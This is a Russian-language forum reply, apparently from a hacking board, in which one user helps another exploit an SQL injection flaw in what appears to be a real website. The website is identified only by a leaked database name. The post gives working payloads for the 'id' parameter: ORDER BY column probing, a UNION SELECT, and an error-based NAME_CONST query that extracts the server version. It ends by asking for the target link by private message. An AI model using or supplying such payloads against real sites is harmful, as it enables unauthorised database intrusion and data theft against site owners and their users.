16.07.2013, 08:52
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Voinmraka
Voinmraka said:
какие бы я запросы не вводил в уязвимый параметр все равно все остается также как я написал выше, разве что время меняется...
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#DD0000"]ap_form_-1_review[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#0000BB"]WHERE id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#0000BB"]Query failed[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Table[/COLOR][COLOR="#DD0000"]'zodiacsi_formy.ap_form_-1_review'[/COLOR][COLOR="#0000BB"]doesn[/COLOR][COLOR="#DD0000"]'t exist[/COLOR][/COLOR]
еще нашел вот это... есть параметр id= если туда ввести значение -1 то выйдет вот это Хм, интересный случай... А если ввести так...
Код:
Code:
Сначала поищем количество полей в таблице
ap_form_1_review
id=1` order by 1 --
id=1` order by 100 --
id=1` union select 1,2,3,4,5 --
Ну или попробовать вариант с error-based
Код:
Code:
id=1` union select * from(select * from(select NAME_CONST((select version()), 14)d) as t join (select NAME_CONST((select version()), 14)e) b)a --
А вообще хотелось бы увидеть линк в ПМ, можно поэкспериментировать...
|
|
|